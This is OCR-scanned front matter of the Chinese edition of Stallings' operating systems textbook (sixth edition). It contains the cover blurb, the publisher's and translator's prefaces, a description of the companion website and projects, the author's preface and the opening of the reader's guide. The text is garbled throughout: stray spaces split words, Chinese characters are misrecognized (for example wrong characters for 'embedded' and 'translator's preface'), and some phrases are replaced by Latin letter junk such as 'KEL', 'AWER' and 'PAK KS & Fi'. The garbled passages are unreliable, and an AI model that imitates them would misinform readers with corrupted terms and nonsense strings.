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AH Ait AFB William Stallings 的 经 典 著作 之 一 ， 其 第 4 版 曾 获得 美国 计算 机 科学 与 工程 
类 大 奖 ， 得 到 了 全 球 计算 机 教育 界 和 工程 技术 人 员 的 好 评 。 书 中 不 仅 全 面 地 讲述 了 操作 系统 的 基本 
概念 、 原 理 和 方法 ， 而 且 还 以 当代 最 流行 的 操作 系统 为 例 ， 全 面 清楚 地 展现 了 当代 操作 系统 的 本 质 
和 特点 。 作 者 针对 近 几 年 操作 系统 领域 的 最 新 变化 ， 对 操作 系统 的 设计 原理 进行 深入 的 阐述 ， 同 时 
将 其 对 操作 系统 整个 领域 全 面 而 深入 的 理解 呈现 给 读者 。 


本 书 特色 

e 选择 Windows Vista、UNIX 和 Linux 三 个 操作 系统 作为 示例 ， 以 帮助 读者 熟悉 当代 操作 系统 的 
设计 原理 和 实现 问题 。 

© 新 增 肉 入 式 操 作 系 统一 章 ， 讨 论 了 赃 入 式 操 作 系 统 的 基本 特点 ， 并 给 出 了 两 个 实例 系统 : 
TinyOS 和 eCos, 

e 在 第 5 版 的 基础 上 扩展 了 计算 机 安全 的 相关 内 容 ， 包 括 计算 机 安全 威胁 和 计算 机 安全 技术 。 

o 扩展 和 更 新 了 并 发 的 相关 内 容 ， 并 增加 了 有 关 游戏 软件 中 多 处 理 器 调度 设计 问题 的 实例 。 

o 补充 动画 演示 、 模 拟 项 目 和 编程 项 目 ， 便 于 培养 学 生 的 动手 实践 能 力 。 

e 改进 了 插图 ， 增 加 大 量 新 的 “现场 测试 ” (field-tested) 型 家 庭 作业 。 

o 调整 和 扩充 了 章 末 的 练习 题 ， 有 助 于 读者 深入 理解 操作 系统 的 精髓 。 


EITANT 3 拥有 美国 麻 省 理工 学 院 计算 机 科学 博士 学 位 ， 现 任教 于 澳 大 
» William Stallings 利 亚 新 南 威尔士 大 学 国防 学 院 (堪培拉 ) 信息 技术 与 电子 工 
人 | 程 系 。 他 是 世界 知名 的 计算 机 学 者 和 畅销 教材 作者 ， 已 经 撰写 了 17 部 著作 ， 出 版 了 40 多 本 书籍 ， 内 


容 涉 及 计算 机 安全 、 计 算 机 网 络 和 计算 机 体系 结构 等 方面 ， 堪 称 计算 机 界 的 全 才 。 他 曾 九 次 荣获 美 
国 “ 教 材 和 学 术 专著 作者 协会 ”颁发 的 “年 度 最 佳 计 算 机 科学 教材 ” 奖 。 
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操作 系统 是 计算 机 系统 的 核心 系统 软件 , 负责 控制 和 管理 整个 系统 , 使 之 协调 工作 。 本 书 不 仅 全 面 地 讲 
述 了 操作 系统 的 基本 概念 、 原 理 和 方法 ， 还 清楚 地 展现 了 当代 操作 系统 的 本 质 和 特点 。 全 书 分 为 八 个 部 分 ， 
由 浅 入 深 地 介绍 了 计算 机 系统 、 操 作 系统 、 进 程 描述 和 控制 、 线 程 、 微 内 核 、 并 发 性 、 内 存 管理 、 虚 拟 内 存 、 
单 处 理 器 调度 、 多 处 理 器 和 实时 调度 、IO 管理 和 磁盘 调度 、 文 件 管理 、 嵌 入 式 操作 系统 、 计 算 机 安全 技术 
以 及 分 布 式 操作 系统 等 内 容 。 


本 书 内 容 丰 富 ,具有 很 强 的 实用 价值 ,适合 作为 高 等 院 校 计算 机 及 相关 专业 本 科 生 的 操作 系统 课程 教材 
也 可 供 专业 技术 人 员 参 考 。 


Simplified Chinese edition copyright @ 2010 by Pearson Education Asia Limited and China Machine Press. 

Original English language title: Operating Systems:Internals and Design Principles, Sixth Edition ISBN 
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出 版 者 的 话 | 


文艺 复兴 以 降 ， 源 远 流 长 的 科学 精神 和 逐步 形成 的 学 术 规 范 ， 使 西方 国家 在 自然 科学 的 
各 个 领域 取得 了 垄断 性 的 优势 ， 也 正 是 这 样 的 传统 ， 使 美国 在 信息 技术 发 展 的 六 十 多 年 间 名 
家 辈出 、 独 领 风 骚 。 在 商业 化 的 进程 中 ， 美 国 的 产业 界 与 教育 界 越 来 越 紧密 地 结合 ， 计 算 机 
学 科 中 的 许多 泰山 北斗 同时 身 处 科研 和 教学 的 最 前 线 ， 由 此 而 产生 的 经 典 科学 著作 ， 不 仅 壁 
划 了 研究 的 范畴 ， 还 揭示 了 学 术 的 源 变 ， 既 遵循 学 术 规范 ， 又 自 有 学 者 个 性 ， 其 价值 并 不 会 
因 年 月 的 流逝 而 减退 。 

近年 ， 在 全 球 信息 化 大 潮 的 推动 下 ， 我 国 的 计算 机 产业 发 展 迅猛 ， 对 专业 人 才 的 需求 日 
益 迫 切 。 这 对 计算 机 教育 界 和 出 版 界 都 既是 机 遇 、 也 是 挑战 ， 而 专业 教材 的 建设 在 教育 战略 
上 显得 举足轻重 。 在 我 国信 息 技术 发 展 时 间 较 短 的 现状 下 ， 美 国 等 发 达 国家 在 其 计算 机 科学 
发 展 的 几 十 年 间 积 淀 和 发 展 的 经 典 教材 仍 有 许多 值得 借鉴 之 处 。 因 此 ， 引 进 一 批 国外 优秀 计 
算 机 教材 将 对 我 国 计 算 机 教育 事业 的 发 展 起 到 积极 的 推动 作用 ， 也 是 与 世界 接轨 、 建 设 真正 
的 世界 一 流 大 学 的 必由之路 。 

机 械 工 业 出 版 社 华章 公司 较 早 意识 到 “出 版 要 为 教育 服务 ”。 自 1998 年 开始 ， 我 们 就 将 工 
作 重 点 放 在 了 六 选 、 移 译 国 外 优秀 教材 上 。 经 过 多 年 的 不 懈 努 力 ， 我 们 与 Pearson，McGraw- 
Hill, Elsevier, MIT, John Wiley & Sons，Cengage 等 世界 著名 出 版 公司 建立 了 良好 的 合作 关 
系 ， 从 他 们 现 有 的 数 百 种 教材 中 王选 出 Andrew S. Tanenbaum, Bjarne Stroustrup, Brain W. 
Kernighan, Dennis Ritchie, Jim Gray, Afred V. Aho, John E. Hopcroft, Jeffrey D. Ullman, 
Abraham Silberschatz, William Stallings, Donald E. Knuth, John L. Hennessy, Larry L. 
Peterson 等 大 师 名 家 的 一 批 经 典 作品 ， 以 “计算 机 科学 丛书 ”为 总 称 出 版 ， 供 读者 学 习 、 研 究 
及 珍藏 。 大 理 石 纹理 的 封面 ， 也 正体 现 了 这 套 丛书 的 品位 和 格调 。 

“计算 机 科学 丛书 ”的 出 版 工作 得 到 了 国内 外 学 者 的 昂 力 襄 助 ， 国 内 的 专家 不 仅 提供 了 中 
肯 的 选 题 指导 ， 还 不 辞 劳苦 地 担任 了 翻译 和 审 校 的 工作 ， 而 原 书 的 作者 也 相当 关注 其 作品 在 
中 国 的 传播 ， 有 的 还 专程 为 其 书 的 中 译本 作 序 。 迄 今 ,“ 计 算 机 科学 丛书 ”已 经 出 版 了 近 两 再 
个 品种 ， 这 些 书籍 在 读者 中 树立 了 良好 的 只 碑 ， 并 被 许多 高 校 采用 为 正式 教材 和 参考 书籍 。 
其 影印 版 “经 典 原版 书库 ”作为 姊妹 篇 也 被 越 来 越 多 实施 双语 教学 的 学 校 所 采用 。 

权威 的 作者 、 经 典 的 教材 、 一 流 的 译 者 、 严 格 的 审 校 、 精 细 的 编辑 ， 这 些 因素 使 我 们 的 
图 书 有 了 质量 的 保证 。 随 着 计算 机 科学 与 技术 专业 学 科 建 设 的 不 断 完 善 和 教材 改革 的 逐渐 深 
化 ， 教 育 界 对 国外 计算 机 教材 的 需求 和 应 用 都 将 步 和 人 一 个 新 的 阶段 ， 我 们 的 目标 是 尽善尽美 ， 
而 反馈 的 意见 正 是 我 们 达到 这 一 终极 目标 的 重要 帮助 。 华 章 公 司 欢迎 老师 和 读者 对 我 们 的 工 
作 提 出 建议 或 给 予 指正 ， 我 们 的 联系 方法 如 下 : 


华章 网 站 : www.hzbook.com 

电子 邮件 ，hzjsj@hzbook.com 
联系 电话 : (010) 88379604 -_ 
联系 地 址 : 北京 市 西城 区 百 万 庄 南 街 1 号 华章 教育 


邮政 编码 : 100037 华章 科技 图 书 出 版 中 心 


谋 者 序 


William Stallings 博士 是 一 位 广 受 欢 迎 的 、 多 产 的 教材 作者 ， 他 所 编写 的 教材 曾 多 次 获得 美 
国教 材 和 学 术 著 作者 协会 (Text and Academic Authors Association) 颁发 的 计算 机 科学 与 工程 教 
材 奖 。 本 书 的 前 几 个 版 本 被 美国 多 所 大 学 采用 作为 教材 或 参考 书 , 中 国 的 操作 系统 课程 教师 和 学 
习 操 作 系 统 课程 的 学 生 对 本 书 的 前 几 个 版 也 非常 熟悉 。 

本 书 围绕 操作 系统 的 概念 、 结 构 和 机 制 , 进行 了 系统 全 面 的 阐述 , 尽 可 能 清晰 地 展示 当代 操 
作 系 统 的 本 质 和 特点 。 特 别 是 新 版 的 内 容 有 了 整体 更 新 ， 以 反映 操作 系统 的 进展 变化 。 

本 书 有 如 下 特色 : 

1) 作者 将 第 6 版 交 给 从 事 相 关 教 学 和 研究 的 教授 们 审阅 ， 使 本 书 在 教育 学 及 用 户 友 善 性 方 
面 有 了 新 的 改进 ， 氢 述 更 加 清晰 、 紧 姿 ， 改 进 了 插图 ， 增 加 大 量 “ 现 场 测 试 ”( field-tested ) 型 
家 庭 作 业 。 

2) KEL Windows Vista 为 例 介 绍 了 Windows 操作 系统 ， 有 关 材 料 由 微软 公司 Windows 内 
核 与 体系 结构 组 的 架构 师 Dave Probert 博士 提供 。 

3 ) 全 书 始 终 将 Windows Vista 和 Linux 作为 操作 系统 实例 使 用 , 尤其 是 由 Dave Probert 博士 
补充 的 对 这 两 个 操作 系统 的 技术 处 理 方式 的 对 比 表格 分 布 在 相关 章节 ， 对 读者 有 极 大 的 帮助 。 

4 ) 本 书 新 增 了 授 入 式 操作 系统 的 内 容 。 尽管 目前 谨 入 式 操作 系统 远 远 多 于 通用 计算 机 系统 ， 
但 是 很 少 有 教材 把 这 个 主题 安排 成 单独 的 一 章 。 本 书 讨论 了 做 入 式 操作 系统 的 基本 特点 , 并 给 出 
了 两 个 实例 系统 : TinyOS 和 eCos。 

5) 在 第 5 版 的 基础 上 扩展 了 安全 相关 的 内 容 ， 包 括 安全 威胁 和 安全 技术 。 同 时 ， 在 本 书 的 
第 3、7 和 12 章 也 针对 相关 主题 补充 了 涉及 安全 的 讨论 。 

6 ) 本 书 第 6 版 还 增加 了 许多 新 的 习题 和 练习 , 这 些 都 有 助 于 读者 深入 理解 操作 系统 的 精 骨 。 

作为 教授 操作 系统 课程 的 教师 , 译 者 认为 要 清楚 理解 操作 系统 概念 , 让 学 生动 手 参加 实践 项 
目 或 参与 一 些 研究 项 目 是 十 分 重要 的 。 本 书 补充 了 下 列 内 容 : 

1 ) 动画 为 理解 现代 操作 系统 中 的 复杂 机 制 提 供 了 强大 的 工具 。 在 动画 展示 方面 ， 本 书 提供 
大 量 动画 ， 涉 及 调度 、 并 发 控制 、 缓 存 命中 以 及 进程 生命 周期 等 内 容 。 在 书 中 适当 的 对 应 之 处 ， 
对 动画 展示 进行 了 突出 标记 ， 可 以 使 学 生 在 学 习 本 书 的 过 程 中 ， 在 恰当 的 位 置 使 用 动画 。 

2 ) 本 书 提供 了 由 美国 德州 大 学 圣安东尼奥 分 校 开 发 的 7 个 模拟 项 目 ， 这 些 模拟 项 目 都 是 与 
操作 系统 设计 中 的 关键 领域 密切 相关 的 。 在 模拟 项 目 基 础 上 给 学 生 布置 了 其 他 作业 项 目 ， 例 如 ， 
学 生 可 以 使 用 这 套 模拟 工具 包 ,， 对 操作 系统 设计 特性 进行 分 析 。 这 些 模 拟 工 具 是 用 Java 编写 的 ， 
既 可 以 作为 一 个 Java 应 用 在 本 地 运行 ， 也 可 以 通过 浏览 器 在 线 运 行 。 

3 ) 本 书 还 提供 了 三 个 系列 的 编程 项 目 供 学 生 参 考 和 练习 。 

参加 本 书 翻 译 、 审 阅 和 校对 的 还 有 桂 尼 克 、 孙 剑 、 张 顺延 、 王 刚 、 刘 瞪 、 汉 涛 、 白 光 冬 、 孔 
俊 俊 、 古 亮 、 畅 明 、 张 琳 、 赵 敬 峰 、 张 旦 峰 、 陈 子 文 、 雷 吉 科 等 ， 特 别 是 桂 尼 克 对 安全 部 分 的 翻 
译 校对 工作 贡献 很 大 。 在 此 对 他 们 的 贡献 表示 诚挚 的 感谢 。 

由 于 译 者 水 平 有 限 ， 译 文中 必定 会 存在 一 些 不 足 或 错误 ， 欢 迎 广大 读者 批评 指正 。 


译 者 


ABA Web 站 点 


Web 站 点 WilliamStallings.com/OS/OS6e.html 为 使 用 本 书 的 教师 和 学 生 提 供 支持 ,该 站 点 包 
括 以 下 内 容 : 
课程 支持 资料 
课程 支持 资料 包括 : 
本 书 所 有 插图 的 PDF 格式 副本 。 
本 书 所 有 表格 的 PDF 格式 副本 。 
用 于 辅助 教学 的 一 组 PowerPoint 幻灯 片 。 
用 于 辅助 学 习 的 HTML 格式 课程 笔记 。 
计算 机 科学 专业 学 生 的 支持 站 点 : 包含 许多 对 计算 机 课程 学 习 非 常 有 用 的 链接 和 文档 。 
这 个 站 点 包括 相关 的 数学 基础 知识 回顾 ; 关于 研究 、 写 报告 、 做 作业 的 建议 和 指导 ; 关 
于 计算 机 科学 的 研究 报告 和 书目 等 资源 的 链接 ; 其 他 有 用 的 链接 。 
@ 本 书 英文 版 的 勘误 表 ， 每 月 更 新 。 


补充 文档 

补充 文档 包括 : 

o 一 套 补 充 的 家 庭 作业 并 附 有 解答。 学 生 可 以 通过 完成 这 些 习 题 并 检查 答案 加 强 对 课程 的 
理解 。 
C 语言 使 用 指南 ， 包 括 针 对 Java 程序 员 的 C 语言 。 
两 章 在 线 课 程 : 内容 为 网 络 化 和 分 布 式 进程 管理 。 
六 个 在 线 附 录 文 档 ， 则 在 扩展 视野 。 讨 论 内 容 包 括 算法 复杂 性 、 因 特 网 标准 和 套 接 字 。 
本 书 所 有 算法 的 PDF 格式 副本 ， 以 易于 理解 的 、 类 Pascal 的 伪 代 码 编 写 。 
为 便于 参考 ， 本 书 中 的 所 有 Windows. UNIX 和 Linux 材料 都 重新 整理 到 三 个 PDF 格式 
的 文档 中 。 


操作 系统 课程 


Web 站 点 包含 关于 使 用 本 书 进行 教学 的 其 他 Web 站 点 的 链接 ， 这 些 站 点 为 如 何 安排 课程 进 
度 以 及 主题 顺序 提供 了 有 用 的 思想 ， 此 外 还 包括 一 些 非常 有 用 的 资料 和 素材 。 


有 用 的 Web 站 点 


Web 站 点 包含 与 相关 站 点 的 链接 。 这 些 链 接 覆 盖 了 很 宽广 的 主题 领域 ， 使 学 生 可 以 进行 深 
人 的 学 习 和 研究 。 


Internet 邮件 列表 


维护 Internet 邮件 列表 是 为 了 给 使 用 本 书 的 教师 之 间 以 及 教师 和 作者 之 间 提 供 一 种 交流 信 
息 、 提 出 建议 、 探 讨 问题 的 方便 途径 。 本 书 的 Web 站 点 还 提供 订购 信息 。 


操作 系统 项 目 


Web 站 点 包含 与 Nachos 和 BACI 站 点 的 链接 ， 这 些 站 点 分 别 对 应 一 个 作为 项 目 实现 框架 的 
软件 包 ， 每 个 站 点 都 包含 可 下 载 的 软件 和 背景 信息 。 更 多 的 信息 请 参阅 附录 C。 


hee te 
HY 局 


目标 

本 书 是 一 本 关于 操作 系统 的 概念 、 结 构 和 机 制 的 教材 , 其 目的 是 尽 可 能 清楚 和 全 面 地 展现 当 
代 操 作 系统 的 本 质 和 特点 。 

这 是 一 项 具有 挑战 性 的 任务 。 首 先 , 需要 为 各 种 各 样 的 计算 机 系统 设计 操作 系统 ,包括 单 用 
户 工作 站 和 个 人 计算 机 、 中 等 规模 的 共享 系统 、 大 型 计算 机 和 超级 计算 机 以 及 诸如 实时 系统 之 类 
的 专门 机 器 。 多 样 性 不 仅 表现 在 机 器 的 容量 和 速度 上 ,而 且 表现 在 具体 应 用 和 系统 支持 的 需求 上 。 
其 次 , 计算 机 系统 正 以 日 新 月 异 的 速度 发 展 变化 , 操作 系统 设计 中 的 许多 重要 领域 都 是 新 近 开始 
研究 的 ， 而 关于 这 些 领域 以 及 其 他 新 领域 的 研究 工作 仍然 在 继续 着 。 

尽管 存在 着 多 样 性 和 变化 快 等 问题 ， 一些 基 本 概念 仍然 贯穿 始终 。 当 然 , 这 些 概念 的 应 用 依 
赖 于 当前 的 技术 状况 和 特定 的 应 用 需求 .本 书 的 目的 是 对 操作 系统 设计 的 基本 原理 提供 全 面 的 讨 
沦 ， 并 且 与 当代 流行 的 设计 问题 以 及 当前 操作 系统 的 发 展 方向 联系 起 来 。 


示例 系统 


本 书 试图 使 读者 熟悉 当代 操作 系统 的 设计 原理 和 实现 问题 ,因此 单纯 讲述 概念 和 理论 是 远 远 
MBN. 为 了 说 明 这 些 概念 ,同时 将 它们 与 真实 世界 中 不 得 不 做 出 的 设计 选择 相 联系 , 本 书 选择 
了 三 个 操作 系统 作为 示例 : 
@ Windows Vista: 用 于 个 人 计算 机 、 工 作 站 和 服务 器 的 多 任务 操作 系统 。 它 融合 了 很 多 操 
作 系 统 发 展 的 最 新 技术 ， 此 外 ，Windows 是 最 早 采用 面向 对 象 原理 设计 的 重要 的 商业 操 
作 系 统 之 一 。 本 书 涵 盖 了 在 Windows 最 新 版 本 Vista 中 所 采用 的 技术 。 

@ UNIX: 最 初 是 为 小 型 计算 机 而 设计 的 多 用 户 操作 系统 , 但 后 来 广泛 用 于 从 微机 到 超级 计 
算 机 的 各 种 机 器 中 。 本 书包 含 若 干 版 本 的 UNIX。FreeBSD 结合 了 很 多 反映 当代 水 平 的 功 
能 ， 是 一 款 得 到 广泛 应 用 的 操作 系统 。Solaris 是 一 款 应 用 广泛 的 商业 版 UNIX 系统 。 

@ Linux: 一 款 目前 非常 普及 且 源 码 开放 的 UNIX 版 本 。 

选择 这 些 系统 是 由 于 它们 的 相关 性 和 代表 性 。 关 于 这 些 示例 系统 的 讨论 贯穿 全 书 , 而 不 是 集 
中 在 某 一 章 或 附录 部 分 。 因 此 , 在 讨论 并 发 性 的 过 程 中 , 将 描述 每 个 示例 系统 的 并 发 机 制 ， 并 探 
究 各 个 设计 选择 的 动机 。 通 过 这 种 方法 , 可 以 利用 真实 的 例子 立即 加 深 对 某 一 特定 章节 中 设计 概 
念 的 理解 。 


读者 对 象 


本 书 是 为 高 等 院 校 师 生 和 专业 人 员 编 写 的 。 作 为 教材 , 本 书 对 应 于 计算 机 科学 、 计 算 机 工程 
和 电子 工程 专业 本 科 一 个 学 期 的 操作 系统 课程 。 书 中 的 专题 包括 由 IEEE 和 ACM 计算 机 委员 会 
的 计算 课程 联合 工作 组 为 计算 机 科学 专业 的 本 科 生 推荐 的 计算 机 课程 ( Computer Curricula 
2001), 同时 也 包括 由 上 述 联合 工作 组 推荐 的 计算 机 科学 2002 联合 学 位 课程 指南 (Guidelines for 
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Associate-Degree Curricula in Computer Science 2002 ) 中 推荐 的 专题 。 本 书 还 是 一 本 基础 参考 书 ， 
同时 也 适 于 自学 。 


本 书 结构 


本 书 分 为 八 个 部 分 (参见 第 0 章 的 综述 ): 背景 、 进 程 、 内 存 、 调 度 、 输 入 /输出 与 文件 、 符 
人 式 系统 、 安 全 、 分 布 式 系统 。 

本 书 具 有 许多 适用 于 教学 的 特征 ， 包 括 使 用 大 量 的 动画 和 图 表 来 阐明 一 些 容易 混淆 的 概念 。 
每 一 章 还 包括 一 些 关 键 术语 列表 、 复 习题 、 课 外 练习 、 进 一 步 学 习 的 建议 和 相关 网 站 的 链接 。 而 
且 ， 还 为 指导 教师 提供 了 题库 。 


以 下 的 教 辅 资料 可 以 通过 访问 受 密码 保护 的 Pearson 网 站 的 教师 资源 区 域 获得 ( www.prenhall.com/ 
stallings ): 

© 参考 答案 : 章 末 复习 题 和 习题 的 解决 方案 。 

o 课件 : 所 有 章节 的 课件 ， 可 以 用 于 课堂 教学 。 

@ PDF 文件 : 本 书 中 全 部 图 和 表 的 副本 。 

@ 项 目 手册 : 下 面 列 出 的 所 有 项 目 类 型 的 推荐 项 目 任务 。 


为 教师 和 学 生 提供 的 Internet 服务 


本 书 的 Web 站 点 为 教师 和 学 生 提 供 支 持 ， 该 站 点 包括 一 些 到 其 他 相关 站 点 和 有 用 文档 的 链 
接 。 参 见 前 面 的 “本 书 的 Web 站 点 ”以 获得 更 多 的 信息 。 网 址 是 http://williamstalllings.com/ 
OS/OS6e.html。 

在 这 个 网 站 上 , 这 一 版 新 添加 了 一 些 课 后 问题 和 解答 。 通 过 求解 问题 并 核对 答案 , 学 生 可 以 
加 强 对 教材 内 容 的 理解 。 

我 们 还 建立 了 邮件 列表 ,使 用 本 书 的 教师 可 以 通过 邮件 列表 来 交换 信息 、 建 议和 遇 到 的 问题 。 
一 旦 发 现 拼 写 或 其 他 错误 ， 本 书 的 勘误 表 将 可 以 在 WilliamStallings.com 上 获得 。 最 后 ， 我 还 在 
WilliamStallings.com/StudentSupport.html 上 维护 了 计算 机 科学 学 生 资 源 网 。 


操作 系统 项 目 和 其 他 学 生 练 习 


对 许多 教师 而 言 , 操作 系统 课程 的 一 个 重要 内 容 是 , 通过 一 个 项 目 或 一 组 项 目 使 得 学 生 能 够 
获得 亲身 体验 , 以 加 深 对 课本 中 概念 的 理解 。 本 书 为 课程 所 包含 的 项 目 部 分 提供 了 非 并 行程 度 的 
支持 ， 它 定义 了 两 个 编程 项 目 。Prentice Hall 的 网 站 为 教师 提供 了 一 些 在 线 参 考 资源 ， 其 中 不 仅 
包括 有 关 项 目 分 配 和 结构 的 指南 , 还 包括 各 种 项 目 类 型 的 用 户 手 册 , 以 及 专门 为 本 书 编写 的 特定 
任务 。 教 师 可 以 在 以 下 方面 布置 任务 : 

@ 动画 任务 : 下 详 。 

@ 模拟 项 目 : 下 详 。 

@ 编程 项 目 : 下 详 。 

@ 研究 项 目 : 一 系列 研究 项 目 可 以 指导 学 生 研究 某 一 个 特定 的 专题 ， 并 且 撰 写 报告 。 

@ 阅读 /报告 练习 : 用 于 阅读 和 撰写 报告 的 多 篇 论文 ， 推 荐 了 一 些 书面 用 语 。 

@ 写作 练习 : 关于 一 些 容易 理解 的 材料 的 一 系列 写作 练习 。 
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© 讨论 专题 : 这 些 专题 可 以 在 课堂 、 聊 天 室 和 消息 展板 上 应 用 ， 以 更 深入 地 扩展 对 于 特定 
领域 的 理解 ， 培 养 学 生 的 合作 能 力 。 另 外 ， 作 为 项 目 实践 的 开发 框架 ， 我 们 提供 了 两 个 
软件 包 : 开发 操作 系统 的 构件 可 以 使 用 Nachos， 学 习 并 发 机 制 可 以 使 用 BACI。 
这 些 项 目 和 课外 练习 使 得 教师 既 可 以 使 用 本 书 作为 丰富 教学 内 容 的 一 部 分 ,也 可 以 根据 教师 
和 学 生 的 特别 需求 进行 裁剪 。 详 见 附 录 Co 


动画 和 模拟 


新 版 结合 使 用 了 动画 和 模拟 。 动画 部 分 用 专门 的 图 标 标 识 出 来 。 对 于 理解 现代 操作 系统 的 一 
些 复杂 机 制 而 言 ， 动 画 是 一 种 强大 的 工具 。 为 了 说 明 操 作 系 统 设 计 中 的 关键 功能 和 算法 , 本 书 使 
用 了 一 些 动画 。 在 书 中 对 应 的 位 置 ， 一 个 特殊 的 图 标 龟 表示 这 里 有 在 线 动画 供 学 生 使 用 。 使 用 
动画 有 两 种 方式 。 在 被 动 模式 中 , 学 生 点 击 相 关 动画 ， 然 后 观看 相关 概念 或 原理 的 动画 。 由 于 这 
些 动画 提供 了 用 户 可 设置 的 初始 条 件 , 所 以 还 可 以 按照 主动 模式 使 用 动画 。 这 样 ， 动 画 也 可 以 作 
为 学 生 作 业 。 教 辅 中 包括 了 每 个 动画 的 相关 作业 。 

IRC 还 提供 了 一 些 在 7 个 模拟 内 容 基 础 上 的 作业 项 目 , 这 些 模拟 都 与 操作 系统 设计 关键 领域 
相关 。 学 生 可 以 使 用 这 套 模拟 工具 包 ， 对 操作 系统 设计 特性 进行 分 析 。 这 些 模 拟 工 具 用 Java 写 
成 ， 既 可 以 作为 一 个 Java 应 用 程序 在 本 地 运行 ， 也 可 以 通过 浏览 器 在 线 运行 。IRC 中 包括 了 学 
生 使 用 的 相关 作业 材料 ， 让 学 生 了 解 如 何 做 以 及 结果 会 是 怎样 的 。 


编程 项 目 


新 版 提供 更 多 的 对 编程 项 目的 支持 。 有 两 个 主要 的 编程 项 目 ， 一 个 用 于 构造 shell， 即 命令 
行 解 释 器 ， 而 另 一 个 项 目 用 于 构造 教材 中 介绍 的 进程 分 派 器 ( process dispatcher )， 它 们 分 别 位 于 
第 3 章 和 第 9 章 的 后 面 。IRC 提供 了 为 开发 程序 所 需要 的 深入 资料 ， 以 及 一 步 一 步 的 练习 。 

作为 蔡 代 方案 , 指导 教师 可 以 安排 强度 更 大 的 系列 项 目 , 这 些 系 列 项 目 涵盖 了 本 书 中 的 许多 
基本 原理 。 为 了 进行 这 些 项 目 , 我 们 为 学 生 提供 了 详细 的 指导 材料 。 另 外 , 还 提供 了 一 套 课外 练 
习 ， 其 中 的 问题 与 每 个 项 目 有 关 ， 供 学 生 回答 。 

最 后 , Æ IRC 提供 的 项 目 手册 中 ， 包 括 了 一 套 涉 及 广泛 专题 的 系列 编程 项 目 ， 它 们 可 以 在 
任何 平台 上 使 用 任何 语言 来 进行 开发 。 


第 6 版 中 的 新 内 容 


自从 第 5 版 发 行 之 后 ,这 四 年 以 来 ,操作 系统 领域 始终 在 不 断 地 变化 。 在 新 版 中 ,作者 试图 
抓 住 这 些 变化 ， 同 时 保持 对 操作 系统 整个 领域 全 面 而 深入 的 阐述 。 为 了 完善 本 书 ， 作 者 将 第 5 版 
交 由 一 批 从 事 相关 教学 和 研究 的 教授 们 审阅 。 所 以 在 新 版 许多 地 方 的 叙述 更 加 清晰 、 紧 凑 ,说明 
也 得 以 改进 。 而 且 ， 增 加 了 大 量 新 的 “现场 测试 ”( field-tested ) 型 的 课外 练习 。 
除了 这 些 教育 学 以 及 用 户 友善 性 方面 的 细 化 之 外 ， 为 了 反映 这 个 令 人 兴奋 的 领域 中 的 进展 ， 
我 们 对 教材 的 技术 内 容 也 进行 了 整体 更 新 。 最 主要 的 变化 如 下 : 
@ 动画 : 动画 为 理解 现代 操作 系统 中 的 复杂 机 制 提供 了 一 种 强大 的 工具 。 第 6 版 中 有 16 
个 动画 ,覆盖 了 调度 、 并 发 控制 、 缓 存 一 致 性 以 及 进程 生命 周期 等 内 容 。 在 书 中 的 相应 
位 置 , 我们 对 动画 进行 了 突出 标记 ,使 得 学 生 在 学 习 本 书 的 过 程 中 可 以 在 恰当 的 时 候 使 
用 动画 。 


IX 


@ Windows Vista: Vista 是 微软 公司 为 PC 机 、 工 作 站 和 服务 器 提供 的 一 种 最 新 型 的 操作 
系统 。 第 6 版 在 介绍 所 有 的 关键 技术 领域 时 都 提供 了 Vista 内 部 的 有 关 细 节 , 包括 进程 / 
线程 管理 、 调 度 、 内 存 管理 、 安 全 、 文 件 系统 以 及 IO。 

@ Vista/Linux 比较 : AWER, 始终 将 Vista 和 Linux 作为 OS 内 部 各 个 方面 的 实例 使 用 。 
第 6 版 的 新 特色 是 ， 涉 及 Vista 和 Linux 的 每 一 章 都 有 一 个 专门 的 部 分 ， 对 这 两 个 操作 
系统 的 技术 处 理 方式 进行 比较 。 

@ 扩展 的 安全 内 容 : 本 书 的 第 七 部 分 “安全 ”完全 是 重 写 的 ， 并 扩展 为 两 章 。 包含 了 许多 
新 的 内 容 。 另 外 ， 本 书 的 重点 几 章 里 (第 3、7 和 12 章 ) 都 安排 有 涉及 安全 的 论述 。 

@ RARER: 第 6 版 包括 了 内 入 式 操作 系统 的 新 章节 。 PAK KS & Fi 
系统 ， 并 构成 了 对 操作 系统 的 独特 挑战 。 这 一 章 包 括 有 关 基 本 原理 的 讨论 ， 以 及 两 个 示 
例 系 统 : TinyOS 和 eCos。 

o 并 发 : 为 了 叙述 上 的 改善 ， 对 有 关 并 发 的 内 容 进行 了 扩展 和 更 新 。 

@ 多 处 理 器 调度 : 增加 了 有 关 游 戏 软 件 中 多 处 理 器 调度 设计 问题 的 实际 示例 。 

本 书 每 一 版 在 增加 新 的 内 容 过 程 中 , 都 要 为 保持 合理 的 页 码 数量 而 奋斗 。 这 个 目标 通过 消除 

过 时 的 材料 和 使 叙述 更 紧凑 来 达到 。 对 于 这 一 版 ， 相 对 不 太 重 要 的 章节 和 附录 以 PDF 文件 的 形 
式 转 到 了 网 上 ， 从 而 不 必 增 加 篇 幅 和 成 本 就 能 对 本 书 的 内 容 进行 扩展 。 
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re ob 2 
第 0 章 读者 指南 
USENET 新 闻 组 本 书 及 相关 We 站 点 包含 了 大 量 的 资料 , 下 面 将 给 读者 提供 一 个 总 体 介 绍 。 


0.1 本 书 概述 


本 书 共 分 为 八 个 部 分 : 
第 一 部 分 “背景 : 提供 关于 计算 机 组 织 与 系统 结构 的 综述 ， 重 点 讲述 与 操作 系统 设计 相关 
的 主题 ， 并 且 概 述 了 本 书 的 其 余部 分 操作 系统 (OS) 的 各 个 主题 。 
第 二 部 分 “进程 : 详细 分 析 进 程 、 多 线程 、 对 称 多 处 理 ( SMP ) AMAK, 还 讨论 了 单一 系 
统 中 的 并 发 机 制 ， 重 点 讲述 了 互 斥 和 死 锁 。 
第 三 部 分 ”存储 器 : 全 面 讲 述 存储 器 管理 技术 ,包括 虚拟 存储 器 。 
第 四 部 分 ”调度 : 对 多 种 进程 调度 方法 进行 分 析 比 较 ， 同 时 还 讨论 线程 调度 、SMP 调度 和 
实时 调度 。 
第 五 部 分 ”输入 /输出 与 文件 ， 分 析 操 作 系 统 中 有 关 输 入 /输出 函数 的 控制 ， 特 别 是 磁盘 输 
人 /输出 ， 它 是 决定 系统 性 能 的 关键 所 在 。 本 部 分 还 给 出 了 关于 文件 管理 的 综述 。 
第 六 部 分 KARRA: 嵌 人 式 系统 的 数量 远 远 多 于 通用 计算 系统 ， 因 此 存在 许多 独特 的 
